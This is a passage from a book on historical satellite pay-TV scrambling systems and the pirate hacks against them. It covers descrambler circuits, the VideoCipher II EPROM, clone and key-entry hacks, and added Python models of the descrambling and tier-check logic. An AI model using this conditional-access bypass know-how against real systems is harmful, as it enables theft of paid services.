now defunct English movie channel, Premiere, used it. The hybrid form of 
BBC transmitted on the Intelsat at 27.5 degrees West used a combination 
of frequencies that were selected at random. However this was not enough 
to prevent the system from being utterly hacked. 


Hacker Descrambler Operation: 


The basic hacker descrambler uses a voltage controlled crystal oscillator 
running at 64 times the frequency of the interfering sine wave. It is 
essentially a phase locked loop circuit. The VCXO increases the cost of the 
actual descrambler. Various low cost alternatives have been employed. 
One of the best of the European hacker designs used a 6.0 MHz ceramic 
resonator. 


The MAAST / SAVE system has an audio scrambling facility. This facility 
was used in the US version but did not see widespread use in Europe due to 
the common use of stereo subcarriers. In the standard audio scrambling 
facility, the audio spectrum is rotated around a nominal 15 KHz carrier. The 
carrier used for the rotation is generally one sixth the frequency of the 
interfering sine wave and is derived by dividing the output of the PLL. 


The BBC SAVE audio scrambling facility was more complex. It is based on 
Spectrum Shifting rather than inversion. As a result the descrambler was 
more complex. A possible circuit for a Spectrum Shift scrambler and 
descrambler was published in the October 1991 issue of Elektor 
Electronics. 

The BBC form of the video scrambling used a number of frequencies for the 
interfering sine wave. This allowed the operator to switch between the 
frequencies. The switch generally occurs in the time when the transponder 
is not carrying video. Most of the pirate descramblers that were used for the 
original single frequency system required a complete upgrade. The 
commonest form was the introduction of a new crystal and a switch. The 
cheaper and more versatile designs use ceramic resonators. 
The last channel to use the system in Europe was Red Hot Dutch. They 
were aware of the insecurity of the system and intended only using it as a 
stopgap system. The crystal frequency used in their variant is that of the 
8085 system clock. Since this frequency divides down to 96 KHz, it does not 
take advantage of the strength of the SAVE system. The frequency of the 
interfering sine wave is meant to be close to the sixth harmonic of the line 
frequency so that beat frequencies are produced. The 96 KHz sine wave is 
too far away from 93.750 KHz for serious amplitude beat frequencies. 
Therefore some people achieved watchable pictures by inverting the video. 
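

The two arithmetic facts behind the MAAST / SAVE description above (the 
interfering sine sits on the sixth line harmonic, and the audio carrier is 
that sine divided by six) can be checked with a small Python model. This is an 
added example, not a circuit from the book or from Telease / Sat-Tel: it 
assumes a 1 MHz sample rate chosen so that the 15.625 kHz carrier lands on a 
whole FFT bin, and it stands in for the PLL-derived carrier and the analogue 
low-pass of a real decoder with a mixer plus a brick-wall filter in the 
frequency domain.

```python
import cmath
import math

LINE_HZ = 15625                       # PAL horizontal line frequency
INTERFERER_HZ = 6 * LINE_HZ           # 93750 Hz: the MAAST interfering sine wave
CARRIER_HZ = INTERFERER_HZ // 6       # 15625 Hz: audio inversion carrier (sine / 6)
FS = 64 * CARRIER_HZ                  # 1 MHz sample rate (assumption of this model)
N = 4096                              # FFT length; bin spacing is FS / N = 244.140625 Hz
CARRIER_BIN = CARRIER_HZ * N // FS    # 64: the carrier is exactly this FFT bin


def beat_offset_hz(interferer_hz: float) -> float:
    """Distance of the interfering sine from the sixth line harmonic.

    A small offset is what the system relies on: a notch that removes the
    interferer also removes the sixth harmonic of the picture, so beat
    patterning is left behind. 96 kHz, as used by Red Hot Dutch, is 2250 Hz away.
    """
    return abs(interferer_hz - 6 * LINE_HZ)


def fft(x):
    """Plain recursive radix-2 FFT (len(x) must be a power of two)."""
    n = len(x)
    if n == 1:
        return [complex(x[0])]
    even, odd = fft(x[0::2]), fft(x[1::2])
    out = [0j] * n
    for k in range(n // 2):
        t = cmath.exp(-2j * math.pi * k / n) * odd[k]
        out[k] = even[k] + t
        out[k + n // 2] = even[k] - t
    return out


def ifft(spectrum):
    n = len(spectrum)
    return [v.conjugate() / n for v in fft([s.conjugate() for s in spectrum])]


def tone(freq_bin: int):
    """Constructed test tone at freq_bin * FS / N hertz."""
    return [math.cos(2 * math.pi * freq_bin * i / N) for i in range(N)]


def spectrum_invert(samples):
    """Mix the audio with the carrier, then low-pass below the carrier.

    cos(a) * 2cos(c) = cos(c - a) + cos(c + a): the difference term is the
    mirrored (inverted) audio, the sum term is removed by the low-pass.
    The same operation applied twice restores the audio, which is all a
    descrambler for this system has to do once it has recovered the carrier.
    """
    mixed = [s * 2 * math.cos(2 * math.pi * CARRIER_BIN * i / N)
             for i, s in enumerate(samples)]
    spec = fft(mixed)
    for k in range(N):
        if min(k, N - k) >= CARRIER_BIN:   # brick-wall low-pass at the carrier
            spec[k] = 0j
    return [v.real for v in ifft(spec)]


def dominant_bin(samples) -> int:
    """Index of the strongest positive-frequency FFT bin."""
    mags = [abs(v) for v in fft(samples)[: N // 2]]
    return max(range(N // 2), key=mags.__getitem__)


if __name__ == "__main__":
    audio = tone(12)                        # about 2.93 kHz
    scrambled = spectrum_invert(audio)      # moves to bin 64 - 12 = 52, about 12.7 kHz
    restored = spectrum_invert(scrambled)   # back to bin 12
    print(dominant_bin(audio), dominant_bin(scrambled), dominant_bin(restored))
    print(beat_offset_hz(93750), beat_offset_hz(96000))
```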


It is unlikely that this system will ever see use on satellite again. It is just too 
insecure but then again there are a lot of stupid people in channel 
management. 


Case Study: Payview III 


Video Scrambling: Synch modification, pseudo line delay, video inversion. 


The horizontal blanking interval is raised above peak white level. This 
confuses the television receiver automatic gain control and clamping 
circuitry. When the scrambled video is displayed on a television set, the 
picture appears dark. The horizontal synch pulse is dithered or rapidly 
shifted in time. This causes a pseudo line delay effect on the scrambled 
video. The line video can be inverted on a sequential or random basis. 


Audio Scrambling: Digital, but not used over satellite. 
Users: Only On Cable 


The Payview III system was first tested via satellite for the now deceased 
Spanish Canal 10. This system was not eventually chosen for use on the 
channel. 


Teleclub were testing this system sporadically throughout 1988 and 
introduced it in 1989. The system was employed in its basic form; alternate 
line inversion and no pseudo random line delay. This level was quickly 
hacked and pirate descramblers flooded the market. 


The system was not difficult to hack in its basic forms. The random line 
inversion would prove more of a problem. The raised horizontal blanking 
section caused problems with some types of satellite receivers. The main 
problem occurred with receivers with inadequate bandwidth. The Teleclub 
satellite transmission format used a 36 MHz transponder bandwidth. Some 
hackers tried to receive the signal using a poorly converted ASTRA 
bandwidth, (26 MHz), receiver. This caused a problem with the color burst 
which appears to be suppressed or attenuated. However Teleclub 
overcame this problem eventually. 


When the system used a rapid form of video inversion, most of the pirate 
descramblers on the market were knocked out. In the majority of cases, it is 
simply a case of an out board modification. Of course given the nature of 
the Blackbox business as it was then, by the time the modification 
appeared, some of the pirate manufacturers had gone bankrupt. 


With Teleclub's switch to Nagra Syster, the Payview system fell out of use 
on satellite. However it is still used in Europe on some cablenets. 


Hacker Descrambler Operation 


The original level of PayView was a very easy hack. The simplest 
descrambler relied on detecting the rise to above peak white. A comparator 
was used. The actual circuit is given as the Pseudo Line Delay Detector 
circuit in Chapter 3. 


The rise to above peak white voltage was used to trigger a set of 
monostables. The monostables generated the properly timed synch and 
blanking level pulses. These pulses were used to gate a "pull down" 
circuit and a synch reinserter. The "pull down" circuit restored the colour 
burst to its proper voltage level. The synch reinserter replaced the blanking 
and synch pulses. 


The use of a synch reinserter was a necessary safeguard. Since many of 
the original pirate descramblers used the negative going transition of the 
horizontal synch pulse to lock on, they were nuked by the introduction of the 
pseudo line delay. Using the rise to above peak white as the lock point 
made that upgrade ineffective. 


The video inversion also caused problems. Many of the earlier 
descramblers had field based sequence generators. They would have to be set with 
a DIP switch for the proper sequence. To counteract these descramblers, 
half sequences were used. As a result the sequence generators were 
knocked out. 


Some of the better descramblers used the inversion key technique of 
detecting the video inversion. This method was also locked to the rising 
edge, but the descrambler had a system clock operating at a multiple of the 
line frequency which generated the sample slot. The sample was taken at 
the start of the active video. 
Eventually, the only way to properly hack the system was to use a 
microcontroller based descrambler. Towards the end of Teleclub's use of 
Payview, microcontroller based decoders were the norm. This reduced the 
upgrade to a case of changing the descrambler's EPROM. 


Case Study: VideoCrypt 
Video Scrambling: Line Cut And Rotate 
Audio Scrambling: Spectrum Inversion - Not Used 
Users: Sky, The Adult Channel, JSTV 


The VideoCrypt system scrambles the video only. It cuts each line of video 
at one of 256 possible cut points. It then rotates the video information 
around this cut point. There are 625 lines in the PAL system. Only 585 lines 
or so are used for video, the rest are used for non-video information such as 
test signals and teletext. This means that only 585 lines have to be 
scrambled. 


The cut point on each line can be defined by one byte or eight bit word. The 
actual sequence of the cut points is pseudo random. The sequence is 
derived from a pseudo random number generator. This chip generates a 
sequence of numbers that will repeat if the sequence is left to run for long 
enough. The start point in the sequence is set by a seed transmitted over 
the air. This seed is changed every 2.5 seconds. 
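

The cut and rotate mechanism described above can be modelled in a few lines 
of Python. This is an added example, not Thomson's or Sky's code, and the 
generator is not the real VideoCrypt PRNG: it assumes 1024 samples per active 
line, uses Python's random module as a stand-in for the PRNG chip, and takes 
the seed directly rather than recovering it from the over-air data.

```python
import random

ACTIVE_LINES = 585        # lines carrying picture, the ones that are scrambled
SAMPLES_PER_LINE = 1024   # assumption of this model: samples per active line
CUT_POINTS = 256          # one byte selects the cut point of each line
SEED_PERIOD_S = 2.5       # the seed sent over the air changes every 2.5 seconds


def cut_sequence(seed: int, n_lines: int = ACTIVE_LINES):
    """Cut point (0..255) for each line from a seeded generator.

    Stand-in for the decoder's PRNG chip: same seed gives the same sequence,
    so sender and receiver agree on every cut point without sending them.
    """
    rng = random.Random(seed)
    return [rng.randrange(CUT_POINTS) for _ in range(n_lines)]


def cut_index(cut: int) -> int:
    """Map a cut byte onto a sample position in the line."""
    return cut * SAMPLES_PER_LINE // CUT_POINTS


def rotate_line(line, cut: int):
    """Cut the line at the cut point and send the second part first."""
    i = cut_index(cut)
    return line[i:] + line[:i]


def unrotate_line(line, cut: int):
    """Inverse: the second part arrived first, put it back after the first part."""
    tail_len = SAMPLES_PER_LINE - cut_index(cut)
    return line[tail_len:] + line[:tail_len]


def scramble_field(field, seed: int):
    cuts = cut_sequence(seed, len(field))
    return [rotate_line(line, cut) for line, cut in zip(field, cuts)]


def descramble_field(field, seed: int):
    cuts = cut_sequence(seed, len(field))
    return [unrotate_line(line, cut) for line, cut in zip(field, cuts)]


def make_test_field(n_lines: int = ACTIVE_LINES):
    """Constructed picture: random sample levels, fixed seed for repeatability."""
    rng = random.Random(1)
    return [[rng.randrange(256) for _ in range(SAMPLES_PER_LINE)] for _ in range(n_lines)]


def lines_recovered(original, candidate) -> int:
    """How many lines of candidate match the original exactly."""
    return sum(1 for a, b in zip(original, candidate) if a == b)


if __name__ == "__main__":
    picture = make_test_field()
    sent = scramble_field(picture, seed=1234)
    # Right seed: every line lines up. Wrong seed: only the odd line where
    # both generators happened to pick the same cut point.
    print(lines_recovered(picture, descramble_field(sent, 1234)))
    print(lines_recovered(picture, descramble_field(sent, 9999)))
```

Rotation only moves samples within a line, so the scrambled line keeps the 
same set of levels; the picture content is hidden by position, not by value.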


Sky Channel's publicity people announced that Sky was to use the most 
pirate proof system yet devised. This claim was made by the publicity 
people and as such it is treated with due cynicism by those in the signal 
security business. It should be noted that every system that was considered 
totally secure has been hacked. What would inspire such confidence, lack 
of brainpower? 


The encryption methods used to protect the keys and the over the air 
addressing data are some of the most advanced yet. The Fiat Shamir Zero 
Knowledge Test is used to authenticate the smart card. Or rather it would be 
if it actually worked. A fault in the program of the smart card interface 
microcontroller in the early decoders meant that the most powerful aspect of 
the system could not be used. 


The descrambler is controlled by a smart card. The initial period for each 
card was to be three months. Due to the expense of distributing the cards, 
Sky tried to get as much time out of each card as they could typically 
stretching each card issue to two years. 
Figure: VideoCrypt - Cut and Rotate Scrambling. Scrambled lines with the 
cut points visible. 


The VideoCrypt system uses Cut and Rotate as its method of video 
scrambling. In the diagram above the cut points are clearly visible. In 
reality, these cut points are hidden or masked using various 
techniques. The Thomson patents may actually hold the clues to the 
exact nature of the scrambling and the transition masking. 


Figure: The VideoCrypt Decoder. Blocks: Smart Card; 1: 8052 Interface 
Controller; 2: 6805 Data Demodulator; 3: Custom Logic PRNG; 4: Video 
Processing. Baseband Input Video in, Output out. 
The SMART card differs from the Automatic Teller Machine cards in that it 
has built in circuitry. The ATM card stores the data on a magnetic strip on its 
back. This built in circuitry in the smart card holds the keys for decrypting 
the seeds and other data transmitted over the air. 


The VideoCrypt system was developed by the French Thomson company. 
The system is one of the more modern scrambling systems that makes use 
of digital television technology. The primary weakness of most of the 
non-digital scrambling systems on the market is that they affect the synch 
pulses in the video. 


The critics of VideoCrypt have called it a halfway technology. In a sense it is. 
The D-MAC video scrambling system uses a double cut and rotate. It cuts 
and rotates the chrominance and the luminance separately. This would 
imply that the D-MAC video scrambling system is twice as secure as the 
VideoCrypt system. 


The technical media in Europe have carried articles examining the security 
of the VideoCrypt system. There were some articles about the system in 
some low level magazines that were little more than regurgitated publicity 
data. The few articles that appeared in the technical media were by the top 
European authorities on satellite signal security. (OK - I wrote the articles) 
They concluded that the VideoCrypt system could be hacked. 
(See Chapters 6 and 7) 


When I wrote the articles, more than a few people disagreed with me. 
One journalist in particular wrote of VideoCrypt in such glowing terms that 
people began to think that he was employed by Sky. Of course he believed 
that VideoCrypt was invincible and it came as a nasty shock when it was 
hacked. 


The litany of hacks on this system is astounding. It is a good thing that they 
described it as having renewable security. The McCormac Hack, proposed 
in Version 2 worked. The write voltage limiting hack, as vaguely outlined on 
page 6-24 of Version 2, worked. The KENtucky Fried Chip hack worked. 
The Ho Lee Fook hack, the Phoenix Hack, the 09 Ho Lee Fook, the 10 
Battery Cards all worked. Not exactly the most pirate proof system yet 
devised was it? 
Case Study: Videocipher II 


Video Scrambling: H and V Synch Replacement, video 
inversion 


The horizontal and vertical synch pulses are removed and replaced with 
digital data. The video is inverted and the color burst is moved to a 
non-standard voltage level. This is primarily to stop certain brands of 
television receivers locking the video using the color burst. 


Audio Scrambling: DES Encrypted Digital. 


The audio is transmitted in 14 bit packets. Quad level Pulse Amplitude 
Modulation is used to transmit the data. 


Users: Primarily used on C-Band. 


VideoCipher II is perhaps the most important scrambling system in the 
history of signal security. It marked the first attempt to have a system 
accepted as the de facto system for video scrambling. It was a good 
scrambling system except someone left the critical data in the decoder 
totally exposed. It was based on the technology of the early eighties but it 
rapidly underwent upgrades and modifications to improve security. 


The VideoCipher II system applied hard digital encryption techniques to the 
digitised audio. The encrypted digital audio was then inserted into the video 
line in place of the synch. The VideoCipher I system applied digital 
encryption to the video and the audio but was only used for studio and 
inter-company video hook-ups. It wasn't really financially viable for the mass 
market that VideoCipher II was intended to serve. 


The digital encryption technique used for encrypting the data was the Data 
Encryption Standard algorithm. The algorithm is reversed by the American 
National Security Agency every day. There is no evidence to suggest that it 
was reversed to hack the VideoCipher system - there were easier ways of 
hacking VideoCipher II. 


The controlled access section of the VideoCipher system uses the DES 
algorithm to encrypt the keys and the programme attributes. The monthly 
key is encrypted with the unique key of each decoder. If a subscriber has 
not paid the fee, disabling the decoder is a simple matter: the monthly key 
transmissions just omit the copy encrypted with that decoder's unique key. 
There are a number of unique keys in each decoder. 


The monthly key is decrypted by the decoder and used to decrypt the 
programme attributes. If the decoder is enabled for the programme, it would 
display the descrambled signal. The system as it stood had a number of 
flaws that almost proved fatal. These flaws led to the biggest piracy and 
counter-piracy battle yet seen. 


[Figure: The VideoCipher II System (page 2-78, chapter 2: The Principles 
Of Security). A scrambled 525-line NTSC line: inverted line video, colour 
burst moved to a non-standard level, 88 bits of QPAM data in the synch 
slot.] 

Original Access Table                  Hacked Access Table 
Channel    Address   Decode Enable     Channel    Address   Decode Enable 
           Bytes     Data                         Bytes     Data 
Channel A            Yes               Channel A            Yes 
Channel B            No                Channel B            Yes 
Channel C            No                Channel C            Yes 

In the original table one channel is enabled. The hack involved 
overwriting the data in each channel's decode enable data. 
This had the effect of fooling the decoder into regarding 
each channel as having been paid for. 

This type of hack became known as the Musketeer Hack. 
One For All And All For One! 


The authorisation data for each decoder is individually addressed. This is 
achieved by encrypting the packet with the descrambler's unique key or 
address. This key was supposedly deeply embedded in the decoder, along 
with a number of alternates. 


The authorisation packet contained a 56 bit Tier Mask, a Service ID and a 
monthly key for the given service ID. The tier mask allowed access to one or 
more of the 56 possible packages available from that service. 


Each programme was transmitted with a similar 56 bit tier mask. This told 
the decoder what package it belonged to. If the programme tier mask 
matched that in the decoder then it could be descrambled. 


The Musketeer Hack 


The control routines were held in EPROM. The routines were disassembled 
and analysed. 


The first basic hack of the VideoCipher system merely involved an alteration 
of the routines in the EPROM. The hack gave the user access to all 
channels having only paid for one. The EPROMs with the altered routines 
became known as “Musketeer Chips” - one for all and all for one! The 
logic (no pun intended) behind the hack was elegant. 


The decoder had a tier mask. This can be thought of as a number of 
registers that would hold a bit for each channel. If the decoder was enabled 
for a channel, the corresponding bit would be high and the decryption 
circuitry would be allowed to decrypt the signal. If the bit was low then the 
decryption process would be inhibited. 


The weakness was that if you had the monthly key then nothing else was 
required. The program in U30, the EPROM, was rewritten so that the tier 
mask was ignored. Since there was no tier mask check, all of the tiers were 
valid and the decoder was free to decode anything on that service. 


GI naturally were able to countermeasure this hack. Indeed their financial 
lives depended on it. By sending some instructions over the air, it was 
possible to get the secure processor to compare the program's tier mask 
with that of the decoder. If they did not match then the decoder halted. 


Preview Bit Hack 


Another hack was the use of the Preview Bit in the tier mask. Sometimes, 
channels would allow the decoder user to have a quick look at what he or 
she was missing. The Preview Bit allowed the decoder to descramble the 
signal for a few minutes. Often the audio was decrypted while the screen 
was blacked out and a barker message was displayed. By using a simple 
video decoder to descramble the video and the VideoCipher II decoder to 
descramble the audio, it was possible to get a clear service. Unfortunately, 
once GI found out, this loophole was plugged. 


Clone Hack 


The simplest hack on the VideoCipher ІІ system was the clone hack. It 
extracted the decoder address and key set from a valid decoder and loaded 
them into other VideoCipher descramblers. As long as the original decoder 
or Clone Master remained authorised, all of the clones operated as well. 


When GI found a clone master, they were able to knock out hundreds of 
clones in one go. The one thing that they were looking for was a decoder 
that was subscribed to all services. This aroused their suspicions. Some of 
the clone hacks only wrote the key set to the battery backed up RAM. This 
left the original key set and address in the Secure Processor (TMS7000). 
One of GI's countermeasures was to check that the sets were the same. 
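The control path behind the Musketeer Hack, GI's tier mask countermeasure 
and the Clone Hack, as an added Python model. This is example code, not 
GI's firmware and not a listing from this book: the packet layout, the 
Decoder class and its field names, and the key-wrapping stand-in used in 
place of DES are all assumptions made for the example. 

```python
"""Model of the VideoCipher II control path: individually addressed
authorisation packets, the tier-mask gate that lived in the U30 EPROM,
GI's secure-processor comparison and the clone key-set check.
Added example: packet layout, names and the DES stand-in are assumptions."""
import hashlib

TIER_BITS = 56


def wrap(unique_key: bytes, monthly_key: bytes) -> bytes:
    """Stand-in for DES encryption of the monthly key under a decoder's
    unique key: XOR with a SHA-256 derived keystream. NOT DES; it is its
    own inverse, so the same call unwraps."""
    stream = hashlib.sha256(unique_key).digest()[: len(monthly_key)]
    return bytes(a ^ b for a, b in zip(monthly_key, stream))


def auth_packet(address: int, unique_key: bytes, tier_mask: int,
                service_id: int, monthly_key: bytes) -> bytes:
    """Assumed layout: 4-byte decoder address, 7-byte (56-bit) tier mask,
    1-byte service ID, 8-byte monthly key wrapped with the unique key."""
    if not 0 <= tier_mask < (1 << TIER_BITS):
        raise ValueError("tier mask must fit in 56 bits")
    return (address.to_bytes(4, "big") + tier_mask.to_bytes(7, "big")
            + bytes([service_id]) + wrap(unique_key, monthly_key))


class Decoder:
    def __init__(self, address: int, unique_key: bytes, musketeer: bool = False):
        self.address = address
        self.secure_key = unique_key      # held in the secure processor (TMS7000)
        self.ram_key = unique_key         # battery-backed RAM copy the firmware uses
        self.musketeer = musketeer        # U30 EPROM patched to skip the tier check
        self.tier_mask = 0
        self.monthly_key = None
        self.halted = False

    def load_clone_keys(self, address: int, unique_key: bytes) -> None:
        """Clone hack variant that writes the master's key set to RAM only."""
        self.address, self.ram_key = address, unique_key

    def authorise(self, pkt: bytes) -> bool:
        """Accept a packet carrying our address. An unpaid decoder never
        sees one, and so never obtains the monthly key."""
        if int.from_bytes(pkt[:4], "big") != self.address:
            return False
        self.tier_mask = int.from_bytes(pkt[4:11], "big")
        self.monthly_key = wrap(self.ram_key, pkt[12:20])
        return True

    def eprom_tier_check(self, programme_mask: int) -> bool:
        """Original U30 routine: programme tier must overlap decoder tiers.
        The Musketeer chip replaced this with an unconditional 'yes'."""
        if self.musketeer:
            return True
        return (self.tier_mask & programme_mask) != 0

    def secure_tier_check(self, programme_mask: int) -> bool:
        """GI countermeasure enabled over the air: the secure processor
        repeats the comparison and halts the decoder on a mismatch."""
        if (self.tier_mask & programme_mask) == 0:
            self.halted = True
            return False
        return True

    def can_decode(self, programme_mask: int, secure_check: bool = False) -> bool:
        if self.halted or self.monthly_key is None:
            return False
        ok = self.eprom_tier_check(programme_mask)
        if secure_check:
            ok = self.secure_tier_check(programme_mask) and ok
        return ok

    def key_sets_match(self) -> bool:
        """GI's other countermeasure: the RAM key set must equal the one in
        the secure processor, which a RAM-only clone cannot satisfy."""
        return self.ram_key == self.secure_key
```

The point the model makes is that the only secret that mattered was the 
monthly key; once the firmware holding the tier comparison sat in a 
socketed EPROM, the comparison could be patched out, and only moving 
the check into the secure processor restored it. 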


The Wizard Hack 


This was the most elegant hack on VideoCipher II. It allowed the direct entry 
of the monthly key from a key pad. The keys were available on bulletin 
boards, in hacker newsletters and on answering machines. Of course this 
type of key distribution is now illegal in the United States. The sources for 
the keys are outside the USA. 


Afterword 


The VideoCipher II system has lost its dominant position. One of the 
reasons for this is the migration to Ku Band systems such as DSS and 
Primestar. The dish size for Ku Band is vastly smaller than that required for 
C-Band. Of course there is an installed base of VideoCipher II decoders. 
VideoCipher II has been largely upgraded to VideoCipher II Plus but even 
that too, apparently, has been hacked. 


VideoCipher II or VideoCipher II Plus would not have stood a snowball's 
chance in Hell in the European environment. In Europe when a channel was 
evaluating potential scrambling systems, any system based on VideoCipher 
II was considered a disaster waiting to happen. Indeed the only service to 
use VideoCipher technology was British Satellite Broadcasting. This company 
was taken over by Sky and most of the management were fired. 
The last few years have seen a change in the very nature of hacks. 
Whereas for the eighties, most systems were analogue with a sprinkling of 
digital, systems of the nineties have become more reliant on digital 
technology. As a result, most of the hacks depend on making the official 
decoders operate in a piratical manner. This generally means modifying 
code in the official smart card or developing a pirate smart card or indeed an 
emulator program. 


This subtle shift away from purely analogue techniques has not rendered 
the analogue techniques useless. There are still analogue systems in 
operation and with the way that things are going to fragment over the next 
few years, knowledge of how to crack analogue systems will be important. 


The evolution of the Blackbox industry over the last few years is almost a 
mirror of the near future case of digital television. Analogue and digital 
systems exist side by side, as they will in the case of digital television. 
Indeed some people seem to consider that digital television will be a failure 
in the short term. 


Of course on satellite, things have changed dramatically as system after 
system collapsed. The analogue systems were easy targets and presented 
no real problems to hack. The next move on the part of the channels was to 
introduce an interim attempt at a digital service. Most notable among these 
was the FilmNet digital audio system add-on for the FilmNet SATPAC 
system. 


The next phase was the change to the D2-MAC EuroCrypt system. The 
technology and the ideas behind this standard were good for the time. It 
signaled a move away from the PAL standard to a more robust and 
potentially useful standard. However the people in the European Commission 
bungled the implementation by an appalling ignorance of reality. 


This lack of understanding is typical. Most of these clueless individuals are 
classically educated. They are trying to draft legislation for a problem whose 
intricacies and subtleties are millennia beyond their mindset. They hire 
consultancies that are similarly clueless about piracy and then are left with 
an awful mess. 


With truly digital television systems expected to come into operation in the 
next few years it will be interesting to see if anything has been learned from 
the fiascos of the past. Then again it is difficult to have any confidence in the 
European Commission and their “advisors”. 
In the Blackbox industry two tracks have appeared - a fast track and a slow 
track situation. Most of the satellite systems are on the fast track. Since the 
footprint of a transponder can cover a geographically large area, a hack on 
a system used on satellite has a wide application and can do a lot of 
damage. 


The slow track is represented by the low paying audience channels, the 
token scrambling systems and the cable systems. These channels and 
operators are not particularly worried by the security of the systems they 
use. Cable operators tend to think that their system is immune to any 
widespread piracy. Most of the older systems, the easily hackable ones, are 
still employed on cable systems despite having been dropped on satellite 
channels long ago. 


There are few of the old analogue scrambling systems left in operation. 
With the increasing number of small cable systems springing up throughout 
Europe, older and less secure scrambling systems are being used as a 
cheap option. As a result of this most of the basic building blocks in this 
chapter have been left in for this version. A representative circuit for each 
system is also given. 


The circuits given in this chapter are those most commonly used by 
hackers. CMOS circuitry is almost invariably used as it is almost totally 
noise immune. This can be a good advantage to have when the receiver is 
microprocessor controlled as indeed are most ASTRA receivers. TTL 
circuitry is not generally used as it is too current hungry. There is a growing 
trend to use the low power fast TTL for crystal oscillator applications. 


Monostables 


Most of the simple analogue scrambling systems interfere with the synch 
section of the video signal. It is therefore essential for the hacker to 
regenerate the synch pulses. The most versatile circuit for this operation is 
the monostable multivibrator. The NE555 may sound like a good choice but 
it is not. It does not offer the designer or hacker the same facilities as the 
gated monostable multivibrator. 


The commonest circuit in hacking for timing purposes is the gated 
monostable multivibrator. Hackers mainly use three versions of this circuit; 
the 4098, the 4528 and the 4538. The 4538 is the precision version and is 
rarely used in low cost descramblers. Each IC contains two monostables. 
The timing constant for each monostable is set by an RC network. Each 
monostable can be leading-edge or trailing-edge triggered. There are two 
outputs, Q and NOT Q. The formulae for the timing constants are given with 
the circuit diagrams. Precision components such as silver mica or polystyrene 
capacitors and metal film resistors are recommended. If precision 
resistors are not available then a carbon film-preset combination should be 
used. These circuits are the cornerstones of analogue hacker descramblers. 
Ceramic capacitors should not be used for setting timing constants as 
they tend to drift causing severe synching problems. 


[Figure: 4098, 4528, 4538 Monostable application circuit.] 


The more recent trend in analogue descrambler design has been to use a 
clock derived window rather than a monostable derived one. The clock 
oscillator is generally running at 2.0 MHz or above and some sequential and 
combinational logic is used to derive the window. Such designs, however, 
belong on the production line. Monostables are used for the initial 
experimentation as they can be adjusted to select the area of the line to be 
examined. When the development stage is complete, the design is generally 
converted to a clock based one as such designs are easier to mass produce. 


Comparators 


With many scrambling systems, it is necessary to detect a particular voltage 
level. This voltage level generally triggers some timing or processing 
circuitry. When the voltage level is part of the video signal, the video signal 
is normally amplified. The 311 comparator IC is then used to check the 
signal against a known reference level. The preset on the reference input, 
(see circuit), is always a multiturn cermet type. The comparator is also used 
as a Schmitt trigger to clean up pulses. In some cases two or more 
comparators will be required. In these cases the 339 quad comparator is 
used. This IC is cheaper than the twin comparator and so will probably be 
used if only two comparators are required. The pinouts for both ICs are 
given in the application diagram. 


In FilmNet descramblers, comparators were used to clean up the synchs or 
detect the polarity of the video using the horizontal synch. Other descram- 
blers such as those used on the Discret system use the comparator to 
detect the start of video in each line. This is accomplished by sampling the 
black level with a sample and hold circuit. The sampled level is then 
compared to the video signal. 


Synch Insertion And Restoration 


There are many methods of reinserting or restoring the synch pulses in 
video signals. The circuits covered here are the most widely used. In some 
cases such as the LuxCrypt system, it is necessary to completely recreate 
the synch pulses. 
Two Amps - One Clamp: 


A simple two amps-one clamp circuit can be used to pull the synch down to 
its proper level. This type of circuit can only be used to restore the synch to 
its proper level, it cannot be used to reinsert a synch pulse. 


A refined form of the two amps-one clamp is used by the more advanced 
hacker. This circuit was first published in “Elektor Electronics”. 


The Multiplexer Approach: 


This circuit allows the black level and the synch tip level to be re-inserted. 
The voltage levels of the blanking and synch tip are set by presets. The 
multiplexer switches off the video and switches in the correct voltages to 
restore the synchs. 


The commonest IC for this purpose is the 4051 one-of-eight analogue 
multiplexer. The normal and inverted video signals are connected to two 
inputs. The black level and synch tip levels are connected to two other 
inputs. Some external logic circuitry controls the addressing pins. 


The application circuit is shown with an NE592 video amplifier connected to 
give positive and inverted video into the multiplexer. 


This type of circuit is most useful in applications that require either a 
polarity key or digital audio information to be separated from the scrambled 
waveform. The circuit can be implemented using the 4066 or 4016 CMOS 
switches instead of the multiplexer. 


Miscellaneous CMOS Circuits 


CMOS Integrator: 


CMOS circuitry can be used in analogue applications. A CMOS inverter can 
be made to function as an operational amplifier. In some applications, an 
integrator circuit is required. A typical circuit block using CMOS inverters as 
op-amps is given along with circuit values. This particular circuit has been 
used in the monostable Filmnet descrambler design to separate the frame 
pulse from the synch signal transmitted on the 7.56 MHz carrier. 


The addition of a 100K resistor across the second capacitor can improve 
the operation of the integrator. The values are not extremely critical. 
[Figure: Synch Insertion Circuits.] 


CMOS Monostable Using NOR Gates: 


In order to protect a descrambler design from reverse engineering, a hacker 
most often resorts to unusual design techniques. The most obvious choice 
for a monostable is the 4528. With this circuit, NOR gates are used to 
function as a monostable. It can be used for general applications where 
precision timing is not necessary. 


Composite Synch Demodulators 


With external synch carriers, a separate demodulator is required. There are 
many circuits available for such a demodulator. The Filmnet SATPAC 
system was a good example of a synch carrier system. Most of the 
commercial pirate descramblers used a TBA120 for the demodulation of the 
carrier. Generally there is a tuned filter prior to the TBA120. This naturally 
adds to the setup costs. On some of the better quality pirate descramblers, 
the 7.56 MHz carrier was upconverted to 10.7 MHz where it is passed 
through a standard 10.7 MHz ceramic filter. Tuning this type of demodulator 
is easier as it only means adjusting a tuning preset. 


A further simplification is the use of a crystal based oscillator to provide the 
mixing frequency. The frequency used is generally high side, (18.26 MHz). 
This approach was used in the Hi Tech Xtravision FilmNet descrambler. 


The cable version of the FilmNet system modulated the synch carrier on to 
the FM audio subcarrier. Most of the pirate designs worked by detecting this 
synch signal and using a PLL. Of course the difference here was that the 
processing would have been better handled at RF. Some television sets 
tended to clamp the video and as a result the descrambled picture from a 
modified satellite type decoder was not as good as the RF version. 


Polarity Detection 


Video inversion is where the video section of the line is inverted but the 
horizontal blanking section of the line remains at normal polarity. It is difficult 
though not impossible to hack. There are a number of weaknesses that 
allow the hacker to ascertain the polarity. The reason the system designers 
considered video inversion so secure was that they had not considered the 
widespread use of microcontrollers in descramblers. The microcontrollers 
allow the hacker to generate accurate time slots for sampling the video 
signal. 


One possibility for defeating random video inversion is to digitise a 
number of lines and compare the first few bytes at the start of each line. 
This may require a frame store to be properly effected. With some of the 
random line inversion systems, there is a signal transmitted in the line to tell 
the legitimate descrambler what type of scrambling to expect. This trigger 
signal is generally transmitted after the colour burst and before the video 
information. This reduces the security of the system and ensures that the 
system can be easily hacked. It should be remembered that most of the 
systems using video inversion were designed prior to 1985 and so reflect 
design ideas that are over ten years old. 


